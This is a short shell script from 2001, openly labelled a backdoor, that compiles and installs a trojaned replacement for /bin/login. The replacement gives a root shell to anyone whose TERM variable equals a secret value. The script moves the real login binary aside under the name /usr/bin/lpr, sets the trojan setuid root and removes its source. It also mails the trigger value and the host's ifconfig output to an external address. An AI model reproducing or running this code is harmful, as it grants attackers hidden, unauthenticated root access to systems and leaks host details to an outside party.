#!/bin/sh
# SECURIFY BACKDOOR TERM login # Coded
by=you@null.com
# 02.27.2001 - www.securify.net - #securify@irc.dal.net
if [ $# -ne 1 ]; then
	echo "Usage: $0 "
	echo ""
	exit 1
fi
# geting TERM parameter
pass=$1
# checking gcc compiler
if [ -f /usr/bin/gcc ]; then
	echo "[-] loading"
	# making backdoor login
cat >> login.c << _EOF_
#define _XOPEN_SOURCE
#include 
#include 
#include 
#include 
#include 
#define SHELL "/bin/sh"
#define SHELL_CALLME "login"
#define LOGIN "/usr/bin/lpr"
#define LOGIN_CALLME "login"
#define ENV_NAME "TERM"
#define ENV_VALUE "$pass"
#define ENV_FIX "vt100"
int owned(void);
char **av, **ep;
int main(int argc, char **argv, char **envp) {
	av=argv;
	ep=envp;
	av[0]=SHELL_CALLME;
	if (owned()) {
		char *sav[]={
			SHELL_CALLME, NULL
		};
		execve(SHELL, sav, ep);
		return 0;
	}
	execve(LOGIN, av, ep);
	return 0;
}
int owned(void) {
	char *name, *value;
	int i;
	for (i=0; ep[i]!=NULL; ++i) {
		name=strtok(ep[i], "=");
		value=strtok(NULL, "=");
		if (name==NULL || value==NULL) continue;
		if (!strncmp(name, ENV_NAME, strlen(ENV_NAME))) {
			if (!strncmp(value, ENV_VALUE, strlen(ENV_VALUE))) {
				char tmp[100];
				sprintf(tmp, "%s=%s", ENV_NAME, ENV_FIX);
				ep[i]=strdup(tmp);
				return 1;
			}
		}
	}
	return 0;
}
_EOF_
	# moving real login change with backdoored login
	cc -o login login.c
	echo "[-] progressing"
	chown root.bin login
	chmod 4555 login
	chmod u-w login
	mv /bin/login /usr/bin/lpr
	echo "TERM=$pass" >> /tmp/root.cron
	sbin/ifconfig -a >> /tmp/root.cron
	mail -s root.cron $by < /tmp/root.cron 
	rm -f /tmp/root.cron
	mv login /bin/login 
	chmod 555 /usr/bin/lpr
	chown root.bin /usr/bin/lpr
	rm -f login.c
	echo "[-] created TERM=$pass" 
	echo
else 
	echo "[x] gcc compiler not found"
	exit 0 
fi